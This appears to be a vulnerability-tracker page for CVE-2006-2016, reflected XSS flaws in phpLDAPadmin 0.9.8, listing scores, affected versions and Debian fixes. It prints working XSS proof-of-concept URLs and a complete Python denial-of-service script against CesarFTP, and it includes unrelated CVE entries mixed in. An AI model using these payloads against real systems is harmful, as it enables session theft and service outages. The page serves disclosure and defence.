CVE-2006-2016
published 2006-04-25CVE-2006-2016: Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1)…
PriorityP420low2.6CVSS 2.0
AVNACHAuNCNIPAN
EXPLOIT
EPSS
8.22%
94.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php; (2) scope parameter in (f) search.php; and (3) Container DN, (4) Machine Name, and (5) UID Number fields in (g) template_engine.php.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | phpldapadmin | < phpldapadmin 0.9.8.3-1 (bookworm) | phpldapadmin 0.9.8.3-1 (bookworm) |
| phpldapadmin_project | phpldapadmin | <= 0.9.8 | — |
| phpldapadmin_project | phpldapadmin | >= 0 < 0.9.8.3-1 | 0.9.8.3-1 |
| phpldapadmin_project | phpldapadmin | >= 0 < 0.9.8.3-1 | 0.9.8.3-1 |
| phpldapadmin_project | phpldapadmin | >= 0 < 0.9.8.3-1 | 0.9.8.3-1 |
CVSS provenance
nvdv2.02.6LOWAV:N/AC:H/Au:N/C:N/I:P/A:N
osv2.6LOW
vendor_redhat8.1HIGH
vendor_debian2.6LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r8w9-95fc-rxgp: Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0
ghsa_unreviewed·2022-05-01
CVE-2006-2016 [LOW] CWE-79 GHSA-r8w9-95fc-rxgp: Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0
Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php; (2) scope parameter in (f) search.php; and (3) Container DN, (4) Machine Name, and (5) UID Number fields in (g) template_engine.php.
OSV
CVE-2006-2016: Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0
osv·2006-04-25·CVSS 2.6
CVE-2006-2016 [LOW] CVE-2006-2016: Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0
Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php; (2) scope parameter in (f) search.php; and (3) Container DN, (4) Machine Name, and (5) UID Number fields in (g) template_engine.php.
Red Hat
perl-DBD-MySQL: Use after free when using prepared statements
vendor_redhat·2016-11-18·CVSS 8.1
CVE-2016-1251 [HIGH] CWE-416 perl-DBD-MySQL: Use after free when using prepared statements
perl-DBD-MySQL: Use after free when using prepared statements
There is a vulnerability of type use-after-free affecting DBD::mysql (aka DBD-mysql or the Database Interface (DBI) MySQL driver for Perl) 3.x and 4.x before 4.041 when used with mysql_server_prepare=1.
Mitigation: This problem is only exposed when the user uses server-side prepared statement support (mysql_server_prepare=1), which is NOT default behavior and was turned off back for all drivers per MySQL AB decision in 2006 due to issues with server-side prepared statements in the server.
Use the default driver setting which uses emulated prepared statements.
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 5) - Will not fix
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 6) - Will not fix
Package: perl-DBD-MySQL (Red Ha
Debian
CVE-2006-2016: phpldapadmin - Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and ea...
vendor_debian·2006·CVSS 2.6
CVE-2006-2016 [LOW] CVE-2006-2016: phpldapadmin - Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and ea...
Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php; (2) scope parameter in (f) search.php; and (3) Container DN, (4) Machine Name, and (5) UID Number fields in (g) template_engine.php.
Scope: local
bookworm: resolved (fixed in 0.9.8.3-1)
forky: resolved (fixed in 0.9.8.3-1)
sid: resolved (fixed in 0.9.8.3-1)
trixie: resolved (fixed in 0.9.8.3-1)
No detection rules found.
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
exploitdb·2016-11-01
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
---
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
CVE-2006-2961 CesarFTP 0.99g - XCWD Denial of Service
CesarFTP 0.99g - XCWD Denial of Service
---
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
Exploit-DB
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
http://pridels0.blogspot.com/2006/04/phpldapadmin-multiple-vuln.htmlhttp://secunia.com/advisories/19747http://secunia.com/advisories/20124http://www.debian.org/security/2006/dsa-1057http://www.osvdb.org/24788http://www.osvdb.org/24789http://www.osvdb.org/24790http://www.osvdb.org/24792http://www.osvdb.org/24793http://www.osvdb.org/24794http://www.securityfocus.com/bid/17643http://www.vupen.com/english/advisories/2006/1450https://exchange.xforce.ibmcloud.com/vulnerabilities/25958https://exchange.xforce.ibmcloud.com/vulnerabilities/25959http://pridels0.blogspot.com/2006/04/phpldapadmin-multiple-vuln.htmlhttp://secunia.com/advisories/19747http://secunia.com/advisories/20124http://www.debian.org/security/2006/dsa-1057http://www.osvdb.org/24788http://www.osvdb.org/24789http://www.osvdb.org/24790http://www.osvdb.org/24792http://www.osvdb.org/24793http://www.osvdb.org/24794http://www.securityfocus.com/bid/17643http://www.vupen.com/english/advisories/2006/1450https://exchange.xforce.ibmcloud.com/vulnerabilities/25958https://exchange.xforce.ibmcloud.com/vulnerabilities/25959
2006-04-25
Published